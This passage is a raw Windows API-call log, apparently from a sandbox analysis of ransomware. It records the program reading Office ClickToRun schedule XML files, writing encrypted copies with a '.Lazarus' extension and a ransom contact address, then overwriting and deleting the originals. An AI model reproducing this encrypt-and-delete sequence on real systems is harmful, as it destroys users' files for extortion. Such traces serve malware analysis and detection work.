(HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0097.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0097.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0097.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0097.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0097.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0097.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0097.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0097.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0097.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0097.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0097.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0097.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0097.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0097.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0097.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0097.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0097.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0097.606] AreFileApisANSI () returned 1 [0097.606] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0097.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fbb8 [0097.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x5fbb8, cchWideChar=83 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 83 [0097.607] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d542e1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80d542e1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x3f141b52, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x12ae)) returned 1 [0097.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fbb8 | out: hHeap=0x20000) returned 1 [0097.607] AreFileApisANSI () returned 1 [0097.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0097.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0097.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0097.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0097.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0097.607] GetLastError () returned 0x0 [0097.607] SetLastError (dwErrCode=0x0) [0097.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4df50 [0097.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x49ca0 [0097.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8bd10 [0097.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d648 [0097.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6d8 [0097.607] GetLastError () returned 0x0 [0097.607] SetLastError (dwErrCode=0x0) [0097.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0097.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8f) returned 0x8a400 [0097.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0097.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0097.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0097.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0097.608] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0097.608] AreFileApisANSI () returned 1 [0097.608] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x55f20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 145 [0097.608] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x122) returned 0x5e870 [0097.608] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x55f20, cbMultiByte=-1, lpWideCharStr=0x5e870, cchWideChar=145 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 145 [0097.608] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0097.617] GetFileType (hFile=0x418) returned 0x1 [0097.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e870 | out: hHeap=0x20000) returned 1 [0097.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0097.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0097.618] AreFileApisANSI () returned 1 [0097.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71bd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0097.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0097.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71bd0, cbMultiByte=-1, lpWideCharStr=0x60348, cchWideChar=83 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 83 [0097.618] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0097.618] GetFileType (hFile=0x368) returned 0x1 [0097.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0097.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0097.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0097.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0097.618] GetLastError () returned 0x0 [0097.618] SetLastError (dwErrCode=0x0) [0097.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0097.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0097.618] GetLastError () returned 0x0 [0097.619] SetLastError (dwErrCode=0x0) [0097.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0097.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0097.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x4f220 [0097.619] ReadFile (in: hFile=0x368, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0097.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0097.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5b8 [0097.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8f448 [0097.621] GetLastError () returned 0x0 [0097.621] SetLastError (dwErrCode=0x0) [0097.621] GetLastError () returned 0x0 [0097.621] SetLastError (dwErrCode=0x0) [0097.621] GetLastError () returned 0x0 [0097.621] SetLastError (dwErrCode=0x0) [0097.621] GetLastError () returned 0x0 [0097.621] SetLastError (dwErrCode=0x0) [0097.621] ReadFile (in: hFile=0x368, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x2ae, lpOverlapped=0x0) returned 1 [0097.622] ReadFile (in: hFile=0x368, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0097.622] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.623] GetLastError () returned 0x0 [0097.623] SetLastError (dwErrCode=0x0) [0097.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe) returned 0x7d5a0 [0097.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6c0 [0097.623] GetLastError () returned 0x0 [0097.623] SetLastError (dwErrCode=0x0) [0097.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5b8 | out: hHeap=0x20000) returned 1 [0097.623] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x2b0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327ef70*=0x2b0, lpOverlapped=0x0) returned 1 [0097.623] GetLastError () returned 0x0 [0097.623] SetLastError (dwErrCode=0x0) [0097.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5a0 | out: hHeap=0x20000) returned 1 [0097.623] GetLastError () returned 0x0 [0097.623] SetLastError (dwErrCode=0x0) [0097.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0097.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0097.624] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6c0 | out: hHeap=0x20000) returned 1 [0097.624] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0097.624] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0097.624] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8f448 | out: hHeap=0x20000) returned 1 [0097.624] CloseHandle (hObject=0x418) returned 1 [0097.624] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0097.624] CloseHandle (hObject=0x368) returned 1 [0097.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0097.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0097.624] AreFileApisANSI () returned 1 [0097.624] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71bd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0097.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fb08 [0097.624] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71bd0, cbMultiByte=-1, lpWideCharStr=0x5fb08, cchWideChar=83 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 83 [0097.625] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0097.625] GetFileType (hFile=0x368) returned 0x1 [0097.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fb08 | out: hHeap=0x20000) returned 1 [0097.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x4f220 [0097.626] GetLastError () returned 0xb7 [0097.626] SetLastError (dwErrCode=0xb7) [0097.626] WriteFile (in: hFile=0x368, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0097.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0097.627] CloseHandle (hObject=0x368) returned 1 [0097.627] AreFileApisANSI () returned 1 [0097.627] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71bd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0097.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0097.627] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71bd0, cbMultiByte=-1, lpWideCharStr=0x5f2c8, cchWideChar=83 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 83 [0097.627] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml")) returned 1 [0097.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0097.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0097.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0097.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0097.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0097.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0097.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0097.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0097.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6d8 | out: hHeap=0x20000) returned 1 [0097.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d648 | out: hHeap=0x20000) returned 1 [0097.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x49ca0 | out: hHeap=0x20000) returned 1 [0097.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bd10 | out: hHeap=0x20000) returned 1 [0097.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0097.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0097.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0097.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0097.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0097.629] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.629] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.629] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d542e1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80d542e1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x3fa7ec8f, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x1162, dwReserved0=0x1, dwReserved1=0x0, cFileName="ServiceWatcherSchedule.xml", cAlternateFileName="SERVIC~1.XML")) returned 1 [0097.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0097.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0097.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0097.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0097.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0097.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0097.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0097.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0097.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0097.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0097.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0097.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0097.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0097.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0097.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0097.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0097.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0097.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0097.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0097.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0097.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0097.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0097.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x812a0 [0097.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0097.630] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.630] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.630] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.630] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x812a0 | out: hHeap=0x20000) returned 1 [0097.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0097.630] AreFileApisANSI () returned 1 [0097.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml", lpUsedDefaultChar=0x0) returned 85 [0097.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0097.630] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.630] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0097.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0097.630] AreFileApisANSI () returned 1 [0097.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 85 [0097.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xaa) returned 0x81358 [0097.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x81358, cchWideChar=85 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 85 [0097.630] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\servicewatcherschedule.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0097.630] GetFileType (hFile=0x368) returned 0x1 [0097.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81358 | out: hHeap=0x20000) returned 1 [0097.631] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0097.631] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0097.631] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0097.631] CloseHandle (hObject=0x368) returned 1 [0097.631] AreFileApisANSI () returned 1 [0097.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 85 [0097.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xaa) returned 0x81358 [0097.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x81358, cchWideChar=85 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 85 [0097.631] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\servicewatcherschedule.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0097.631] GetFileType (hFile=0x368) returned 0x1 [0097.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81358 | out: hHeap=0x20000) returned 1 [0097.632] CloseHandle (hObject=0x368) returned 1 [0097.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.632] RtlAllocateHeap 